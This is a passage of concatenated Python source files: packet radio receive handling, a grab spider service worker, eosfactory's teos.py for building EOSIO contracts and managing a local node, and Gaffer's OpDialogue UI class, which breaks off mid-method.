if p.type == self.last_packet_received.type and p.sequence == self.last_packet_received.sequence:
self.packet_logger.debug("RECV PKT previous")
self.packet_radio.tx_up()
continue
self.packet_logger.info("RECV PKT %s" % p)
self.packet_logger.debug("RECEIVED unexpected packet: %s" % p)
self.current_exchange.protocol_errors += 1
self.last_packet_received = p
self.packet_sequence = (p.sequence + 1) % 32
packet_to_send.with_sequence(self.packet_sequence)
start_time = time.time()
continue
except PacketRadioError:
self.current_exchange.radio_errors += 1
self.logger.exception("Radio error during send and receive, retrying")
if not self._radio_init(3):
raise
start_time = time.time()
else:
self.logger.warning("Exceeded timeout while waiting for silence to fall")
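# Raw receive buffers carry the RSSI in the first byte; the radio packet itself
# starts at offset 2 (byte 1 is not used here) and is decoded with
# RadioPacket.parse(). Parse failures are logged and reported as (None, rssi).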
def _get_packet(self, data):
rssi = None
if data is not None and len(data) > 2:
rssi = data[0]
try:
return RadioPacket.parse(data[2:]), rssi
except:
getLogger().exception("RECEIVED DATA: %s RSSI: %d" % (binascii.hexlify(data[2:]), rssi))
return None, rssi
|
base_service.py
|
from threading import Thread, Event
import logging
import sys
# pylint: disable=invalid-name
logger = logging.getLogger('grab.spider.base_service')
# pylint: enable=invalid-name
class ServiceWorker(object):
def __init__(self, spider, worker_callback):
self.spider = spider
self.thread = Thread(
target=self.worker_callback_wrapper(worker_callback),
args=[self]
)
self.thread.daemon = True
th_name = 'worker:%s:%s' % (
worker_callback.__self__.__class__.__name__,
worker_callback.__name__,
)
self.thread.name = th_name
self.pause_event = Event()
self.stop_event = Event()
self.resume_event = Event()
self.activity_paused = Event()
self.is_busy_event = Event()
def worker_callback_wrapper(self, callback):
def wrapper(*args, **kwargs):
try:
callback(*args, **kwargs)
except Exception as ex: # pylint: disable=broad-except
logger.error('Spider Service Fatal Error', exc_info=ex)
self.spider.fatal_error_queue.put(sys.exc_info())
return wrapper
def start(self):
self.thread.start()
def stop(self):
self.stop_event.set()
def process_pause_signal(self):
if self.pause_event.is_set():
self.activity_paused.set()
self.resume_event.wait()
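# pause()/resume() implement a simple handshake: pause() clears resume_event and
# sets pause_event, then waits until the worker acknowledges via activity_paused
# (set in process_pause_signal()) or until the worker thread dies.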
def pause(self):
self.resume_event.clear()
self.pause_event.set()
while True:
if self.activity_paused.wait(0.1):
break
if not self.is_alive():
break
def resume(self):
self.pause_event.clear()
self.activity_paused.clear()
self.resume_event.set()
def is_alive(self):
return self.thread.is_alive()
class BaseService(object):
def create_worker(self, worker_action):
# pylint: disable=no-member
return ServiceWorker(self.spider, worker_action)
def iterate_workers(self, objects):
for obj in objects:
assert isinstance(obj, (ServiceWorker, list))
if isinstance(obj, ServiceWorker):
yield obj
elif isinstance(obj, list):
for item in obj:
yield item
def start(self):
for worker in self.iterate_workers(self.worker_registry):
worker.start()
def stop(self):
for worker in self.iterate_workers(self.worker_registry):
worker.stop()
def pause(self):
for worker in self.iterate_workers(self.worker_registry):
worker.pause()
#logging.debug('Service %s paused' % self.__class__.__name__)
def resume(self):
for worker in self.iterate_workers(self.worker_registry):
worker.resume()
#logging.debug('Service %s resumed' % self.__class__.__name__)
def register_workers(self, *args):
# pylint: disable=attribute-defined-outside-init
self.worker_registry = args
def is_busy(self):
return any(x.is_busy_event.is_set() for x in
self.iterate_workers(self.worker_registry))
def is_alive(self):
return any(x.is_alive() for x in
self.iterate_workers(self.worker_registry))
|
teos.py
|
#!/usr/bin/python3
import os
import subprocess
import threading
import time
import re
import pathlib
import shutil
import pprint
import json
import sys
import eosfactory.core.errors as errors
import eosfactory.core.logger as logger
import eosfactory.core.utils as utils
import eosfactory.core.setup as setup
import eosfactory.core.config as config
import eosfactory.core.vscode as vscode
TEMPLATE_CONTRACTS_DIR = "templates/contracts"
TEMPLATE_NAME = "CONTRACT_NAME"
TEMPLATE_HOME = "${HOME}"
TEMPLATE_ROOT = "${ROOT}"
C_CPP_PROP = "${c_cpp_prop}"
TASK_JSON = "${tasks}"
CONFIGURATIONS = "configurations"
INCLUDE_PATH = "includePath"
BROWSE = "browse"
WORKSPACE_FOLDER = "${workspaceFolder}"
EOSIO_CPP_INCLUDE = "/usr/opt/eosio.cdt"
def replace_templates(string):
home = os.environ["HOME"]
root = ""
if is_windows_ubuntu():
home = config.wsl_root() + home
root = config.wsl_root()
string = string.replace(TEMPLATE_HOME, home)
string = string.replace(TEMPLATE_ROOT, root)
return string
def get_c_cpp_properties(contract_dir=None, c_cpp_properties_path=None):
if not contract_dir:
contract_dir = os.getcwd()
if not c_cpp_properties_path:
c_cpp_properties_path = os.path.join(
contract_dir, ".vscode/c_cpp_properties.json")
else:
c_cpp_properties_path = utils.wslMapWindowsLinux(c_cpp_properties_path)
if not os.path.exists(c_cpp_properties_path):
raise errors.Error('''
The given path does not exist:
{}
'''.format(c_cpp_properties_path))
if os.path.exists(c_cpp_properties_path):
try:
with open(c_cpp_properties_path, "r") as input:
return json.loads(input.read())
except Exception as e:
raise errors.Error(str(e))
else:
return json.loads(replace_templates(vscode.c_cpp_properties()))
def ABI(
contract_dir_hint=None, c_cpp_properties_path=None,
verbosity=None):
'''Given a hint to a contract directory, produce ABI file.
'''
contract_dir = config.contract_dir(contract_dir_hint)
# source_files[0] is directory, source_files[1] is contents:
contract_source_files = config.contract_source_files(contract_dir)
source_files = []
source_ext = [".c", ".cpp",".cxx", ".c++"]
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() in source_ext:
source_files.append(file)
if not source_files:
raise errors.Error('''
The source is empty. The assumed contract dir is
{}
'''.format(contract_dir))
code_name = os.path.splitext(os.path.basename(source_files[0]))[0]
target_dir = get_target_dir(contract_source_files[0])
target_path = os.path.normpath(
os.path.join(target_dir, code_name + ".abi"))
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() == ".abi":
logger.INFO('''
NOTE:
An ABI exists in the source directory. Cannot overwrite it:
{}
Moving it to the target directory.
'''.format(file), verbosity)
shutil.move(file, target_path)
return
command_line = [
config.eosio_cpp(),
"-contract=" + code_name,
"-R=" + get_resources_dir(contract_source_files[0]),
"-abigen",
"-abigen_output=" + target_path]
c_cpp_properties = get_c_cpp_properties(
contract_dir, c_cpp_properties_path)
for entry in c_cpp_properties[CONFIGURATIONS][0][INCLUDE_PATH]:
if WORKSPACE_FOLDER in entry:
entry = entry.replace(WORKSPACE_FOLDER, contract_dir)
command_line.append(
"-I" + utils.wslMapWindowsLinux(entry))
else:
if not EOSIO_CPP_INCLUDE in entry:
command_line.append(
"-I" + utils.wslMapWindowsLinux(
strip_wsl_root(entry)))
for file in source_files:
command_line.append(file)
try:
eosio_cpp(command_line, target_dir)
except Exception as e:
raise errors.Error(str(e))
logger.TRACE('''
ABI file written to:
{}
'''.format(target_path), verbosity)
def WASM(
contract_dir_hint, c_cpp_properties_path=None,
compile_only=False, verbosity=None):
'''Produce WASM code.
'''
contract_dir = config.contract_dir(contract_dir_hint)
# source_files[0] is directory, source_files[1] is contents:
contract_source_files = config.contract_source_files(contract_dir)
source_files = []
source_ext = [".c", ".cpp",".cxx", ".c++"]
for file in contract_source_files[1]:
if os.path.splitext(file)[1].lower() in source_ext:
source_files.append(file)
if not source_files:
raise errors.Error('''
The source is empty. The assumed contract dir is
{}
'''.format(contract_dir))
code_name = os.path.splitext(os.path.basename(source_files[0]))[0]
target_dir = get_target_dir(contract_source_files[0])
target_path = os.path.normpath(
os.path.join(target_dir, code_name + ".wasm"))
c_cpp_properties = get_c_cpp_properties(
contract_dir, c_cpp_properties_path)
command_line = [config.eosio_cpp()]
for entry in c_cpp_properties[CONFIGURATIONS][0][INCLUDE_PATH]:
if WORKSPACE_FOLDER in entry:
entry = entry.replace(WORKSPACE_FOLDER, contract_dir)
command_line.append("-I=" + utils.wslMapWindowsLinux(entry))
else:
if not EOSIO_CPP_INCLUDE in entry:
command_line.append(
"-I=" + utils.wslMapWindowsLinux(strip_wsl_root(entry)))
for entry in c_cpp_properties[CONFIGURATIONS][0]["libs"]:
command_line.append(
"-l=" + utils.wslMapWindowsLinux(strip_wsl_root(entry)))
for entry in c_cpp_properties[CONFIGURATIONS][0]["compilerOptions"]:
command_line.append(entry)
for file in source_files:
command_line.append(file)
if setup.is_print_command_line:
print("######## \n{}:".format(" ".join(command_line)))
if compile_only:
command_line.append("-c=")
command_line.append("-o=" + target_path)
try:
eosio_cpp(command_line, target_dir)
except Exception as e:
raise errors.Error(str(e))
if not compile_only:
logger.TRACE('''
WASM file written to:
{}
'''.format(os.path.normpath(target_path)), verbosity)
def project_from_template(
project_name, template=None, workspace_dir=None,
c_cpp_prop_path=None,
include=None,
libs=None,
remove_existing=False,
open_vscode=False, throw_exists=False,
verbosity=None):
'''Given the project name and template name, create a smart contract project.
- **parameters**::
project_name: The name of the project, or an existing path to
a directory.
template: The name of the template used.
workspace_dir: If set, the folder for the work-space. Defaults to the
value returned by the config.contract_workspace() function.
include: If set, comma-separated list of include folders.
libs: If set, comma-separated list of libraries.
remove_existing: If set, overwrite any existing project.
open_vscode: If set, open VSCode, if available.
verbosity: The logging configuration.
'''
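# Illustrative call (hypothetical project and template names, shown only as an
# example of the arguments described above):
#   project_from_template("hello", template="01_hello_world",
#                         workspace_dir="/tmp/contracts")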
project_name = utils.wslMapWindowsLinux(project_name.strip())
template = template.strip()
template_dir = utils.wslMapWindowsLinux(template)
if not os.path.isdir(template_dir):
template_dir = os.path.join(
config.eosf_dir(), TEMPLATE_CONTRACTS_DIR, template)
if not os.path.isdir(template_dir):
raise errors.Error('''
Template directory '{}' does not exist.
'''.format(template_dir))
if c_cpp_prop_path:
c_cpp_prop_path = utils.wslMapWindowsLinux(c_cpp_prop_path)
if os.path.exists(c_cpp_prop_path):
try:
with open(c_cpp_prop_path, "r") as input:
c_cpp_properties = input.read()
except Exception:
c_cpp_properties = vscode.c_cpp_properties()
else:
c_cpp_properties = vscode.c_cpp_properties()
c_cpp_properties = replace_templates(c_cpp_properties)
if include:
c_cpp_properties_json = json.loads(c_cpp_properties)
c_cpp_properties_json[CONFIGURATIONS][0][INCLUDE_PATH].extend(
include.split(", "))
c_cpp_properties_json[CONFIGURATIONS][0][BROWSE]["path"].extend(
include.split(", "))
c_cpp_properties = json.dumps(c_cpp_properties_json, indent=4)
if libs:
c_cpp_properties_json = json.loads(c_cpp_properties)
c_cpp_properties_json[CONFIGURATIONS][0]["libs"].extend(
libs.split(", "))
c_cpp_properties = json.dumps(c_cpp_properties_json, indent=4)
split = os.path.split(project_name)
if os.path.isdir(split[0]):
project_dir = project_name
project_name = split[1]
else:
if not workspace_dir \
or not os.path.isabs(workspace_dir) \
or not os.path.exists(workspace_dir):
workspace_dir = config.contract_workspace()
workspace_dir = workspace_dir.strip()
project_dir = os.path.join(workspace_dir, project_name)
if os.path.isdir(project_dir):
if os.listdir(project_dir):
if remove_existing:
try:
shutil.rmtree(project_dir)
except Exception as e:
raise errors.Error('''
Cannot remove the directory {}.
error message:
==============
{}
'''.format(project_dir, str(e)))
else:
msg = '''
NOTE:
Contract workspace
'{}'
already exists. Cannot overwrite it.
'''.format(project_dir)
raise errors.Error(msg)
try: # make contract directory and its build directory:
os.makedirs(os.path.join(project_dir, "build"))
except Exception as e:
raise errors.Error(str(e))
def copy_dir_contents(
project_dir, template_dir, directory, project_name):
contents = os.listdir(os.path.join(template_dir, directory))
for item in contents:
path = os.path.join(directory, item)
template_path = os.path.join(template_dir, path)
contract_path = os.path.join(
project_dir, path.replace(
TEMPLATE_NAME, project_name))
if os.path.isdir(template_path):
os.mkdir(contract_path)
copy_dir_contents(
project_dir, template_dir, path, project_name)
elif os.path.isfile(template_path):
copy(template_path, contract_path, project_name)
def copy(template_path, contract_path, project_name):
with open(template_path, "r") as input:
template = input.read()
if TEMPLATE_HOME in template or TEMPLATE_ROOT in template:
template = replace_templates(template)
template = template.replace("${" + TEMPLATE_NAME + "}", project_name)
template = template.replace(C_CPP_PROP, c_cpp_properties)
template = template.replace(TASK_JSON, vscode.TASKS)
with open(contract_path, "w") as output:
output.write(template)
copy_dir_contents(project_dir, template_dir, "", project_name)
logger.TRACE('''
* Contract project '{}' created from template
'{}'
'''.format(project_name, template_dir), verbosity)
if open_vscode:
if is_windows_ubuntu():
command_line = "cmd.exe /C code {}".format(
utils.wslMapLinuxWindows(project_dir))
elif uname() == "Darwin":
command_line = "open -n -b com.microsoft.VSCode --args {}".format(
project_dir)
else:
command_line = "code {}".format(project_dir)
os.system(command_line)
logger.INFO('''
######### Created contract project ``{}``,
originated from template
``{}``.
'''.format(project_name, template_dir), verbosity)
return project_dir
def strip_wsl_root(path):
wsl_root = config.wsl_root()
if wsl_root:
return path.replace(config.wsl_root(), "")
else:
return path
def get_pid(name=None):
"""Return process ids found by (partial) name or regex.
>>> get_pid('kthreadd')
[2]
>>> get_pid('watchdog')
[10, 11, 16, 21, 26, 31, 36, 41, 46, 51, 56, 61] # ymmv
>>> get_pid('non-existent process')
[]
"""
if not name:
name = os.path.splitext(os.path.basename(config.node_exe()))[0]
command_line = ['pgrep', '-f', name]
stdout = utils.process(
command_line, "Cannot determine PID of any nodeos process.")
return [int(pid) for pid in stdout.split()]
def uname(options=None):
command_line = ['uname']
if options:
command_line.append(options)
return utils.process(command_line)
def is_windows_ubuntu():
resp = uname("-v")
return resp.find("Microsoft") != -1
def eosio_cpp(command_line, target_dir):
cwd = os.path.join(target_dir, "cwd")
os.mkdir(cwd)
p = subprocess.run(
command_line,
cwd=cwd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout = p.stdout.decode("ISO-8859-1")
stderr = p.stderr.decode("ISO-8859-1")
returncode = p.returncode
shutil.rmtree(cwd)
if returncode:
raise errors.Error('''
command line:
=============
{}
error message:
==============
{}
'''.format(" ".join(command_line), stderr))
return returncode
def get_target_dir(source_dir):
dir = os.path.join(source_dir, "build")
if os.path.exists(dir):
return dir
dir = os.path.join(source_dir, "..", "build")
if os.path.exists(dir):
return dir
try:
os.mkdir(dir)
except Exception as e:
raise errors.Error(str(e))
return dir
def get_resources_dir(source_dir):
dir = os.path.join(source_dir, "..", "resources")
if os.path.exists(dir):
return dir
dir = os.path.join(source_dir, "resources")
if not os.path.exists(dir):
try:
os.mkdir(dir)
except Exception as e:
raise errors.Error(str(e))
return dir
def args(clear=False):
args_ = [
"--http-server-address", config.http_server_address(),
"--data-dir", config.data_dir(),
"--config-dir", config.config_dir(),
"--chain-state-db-size-mb", config.chain_state_db_size_mb(),
"--contracts-console",
"--verbose-http-errors",
"--enable-stale-production",
"--producer-name eosio",
"--signature-provider " + config.eosio_key_public() + "=KEY:"
+ config.eosio_key_private(),
"--plugin eosio::producer_plugin",
"--plugin eosio::chain_api_plugin",
"--plugin eosio::http_plugin",
"--plugin eosio::history_api_plugin"
]
if clear:
node_stop()
args_.extend([
"--genesis-json", config.genesis_json(),
"--delete-all-blocks"
])
return args_
def keosd_start():
if not config.keosd_wallet_dir(raise_error=False):
utils.process([config.keosd_exe()])
while True:
time.sleep(1)
if config.keosd_wallet_dir(raise_error=False):
break
def on_nodeos_error(clear=False):
node_stop()
args_ = args(clear)
args_.insert(0, config.node_exe())
command_line = " ".join(args_)
logger.ERROR('''
The local ``nodeos`` failed to start twice in sequence. Perhaps something is
wrong with the configuration of the system. See the command line issued:
''')
print("\n{}\n".format(command_line))
logger.INFO('''
Now, see the result of an execution of the command line:
''')
def runInThread():
p = subprocess.run(
command_line,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
err_msg = p.stderr.decode("ISO-8859-1")
if "error" in err_msg and not "exit shutdown" in err_msg:
raise errors.Error(err_msg)
elif not err_msg or "exit shutdown" in err_msg:
logger.OUT(
'''
Just another instability incident of the ``nodeos`` executable.
Rerun the script.
'''
)
else:
print(err_msg)
thread = threading.Thread(target=runInThread)
thread.start()
time.sleep(10)
node_stop()
exit()
def node_start(clear=False, nodeos_stdout=None):
'''Start the local EOSIO node.
Args:
clear (bool): If set, the blockchain is deleted and then re-created.
nodeos_stdout (str): If set, a file to which the *stdout* stream of
the local *nodeos* is sent. Note that the file can also be set in
the configuration of EOSFactory, see :func:`.core.config.nodeos_stdout`.
If the file is set both in the configuration and with this argument,
the argument setting prevails.
'''
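# Typical calls (illustrative only): node_start(clear=True) deletes the existing
# blockchain and restarts from the genesis file, while node_start() resumes the
# existing one.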
args_ = args(clear)
if setup.is_print_command_line:
print("nodeos command line:")
print(config.node_exe() + " " + " ".join(args_))
if not nodeos_stdout:
nodeos_stdout = config.nodeos_stdout()
std_out_handle = subprocess.DEVNULL
if nodeos_stdout:
try:
std_out_handle = open(nodeos_stdout, 'w')
except Exception as e:
raise errors.Error('''
Error when preparing to start the local EOS node: cannot open the given stdout
log file
{}
Error message:
{}
'''.format(nodeos_stdout, str(e)))
def onExit():
if not std_out_handle == subprocess.DEVNULL:
try:
std_out_handle.close()
except:
pass
args_.insert(0, config.node_exe())
def runInThread():
proc = subprocess.Popen(
" ".join(args_),
stdin=subprocess.DEVNULL, stdout=std_out_handle,
stderr=subprocess.DEVNULL, shell=True)
proc.wait()
onExit()
return
thread = threading.Thread(target=runInThread)
thread.start()
def node_probe():
count = 10
num = 5
block_num = None
while True:
time.sleep(1)
try:
import eosfactory.core.cleos_get as cleos_get
head_block_num = cleos_get.GetInfo(is_verbose=0).head_block
except:
head_block_num = 0
finally:
print(".", end="", flush=True)
if block_num is None:
block_num = head_block_num
if head_block_num - block_num >= num:
print()
logger.INFO('''
Local node is running. Block number is {}
'''.format(head_block_num))
break
count = count - 1
if count <= 0:
raise errors.Error('''
The local node does not respond.
''')
def is_local_node_process_running(name=None):
if not name:
name = config.node_exe()
return name in utils.process(
'ps aux | grep -v grep | grep ' + name, shell=True)
def node_stop():
# You can see if the process is a zombie by using top or
# the following command:
# ps aux | awk '$8=="Z" {print $2}'
pids = get_pid()
count = 10
if pids:
for pid in pids:
os.system("kill " + str(pid))
while count > 0:
time.sleep(1)
if not is_local_node_process_running():
break
count = count -1
if count <= 0:
raise errors.Error('''
Failed to kill {}. Pid is {}.
'''.format(config.node_exe_name(), str(pids))
)
else:
logger.INFO('''
Local node is stopped {}.
'''.format(str(pids)))
def node_is_running():
return not get_pid()
|
OpDialogue.py
|
##########################################################################
#
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import sys
import threading
import traceback
import IECore
import Gaffer
import GafferUI
## A dialogue which allows a user to edit the parameters of an
# IECore.Op instance and then execute it.
class OpDialogue( GafferUI.Dialogue ) :
## Defines what happens when the op has been successfully executed :
#
# FromUserData : Get behaviour from ["UI"]["postExecuteBehaviour"] userData, which should
# contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to DisplayResult.
#
# None : Do nothing. The dialogue returns to the parameter editing state.
#
# Close : The dialogue is closed immediately.
#
# DisplayResult : The result is displayed, with a button for returning to the parameter editing state.
#
# DisplayResultAndClose : The result is displayed, with a button for closing the dialogue.
#
# NoneByDefault : deprecated - the same as DisplayResult
# CloseByDefault : deprecated - the same as DisplayResult
PostExecuteBehaviour = IECore.Enum.create( "FromUserData", "None", "Close", "DisplayResult", "DisplayResultAndClose", "NoneByDefault", "CloseByDefault" )
## Defines which button has the focus when the op is displayed for editing.
#
# FromUserData : Gets the default button from ["UI"]["defaultButton"] userData, which
# should contain a string value specifying one of the other Enum values. If no userData is found,
# it defaults to OK.
#
# None : Neither button has the focus.
#
# OK : The OK button has the focus.
#
# Cancel : The cancel button has the focus.
DefaultButton = IECore.Enum.create( "FromUserData", "None", "OK", "Cancel" )
# If executeInBackground is True, then the Op will be executed on another
# thread, allowing the UI to remain responsive during execution. This is
# the preferred method of operation, but it is currently not the default
# in case certain clients are relying on running the Op on the main thread.
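# A minimal usage sketch (illustrative; assumes ``myOp`` is an IECore.Op instance) :
#
# dialogue = GafferUI.OpDialogue( myOp )
# result = dialogue.waitForResult()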
def __init__(
self,
opInstanceOrOpHolderInstance,
title=None,
sizeMode=GafferUI.Window.SizeMode.Manual,
postExecuteBehaviour = PostExecuteBehaviour.FromUserData,
executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = Gaffer.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( IECore.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( IECore.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception, e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "opDialogueFailure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
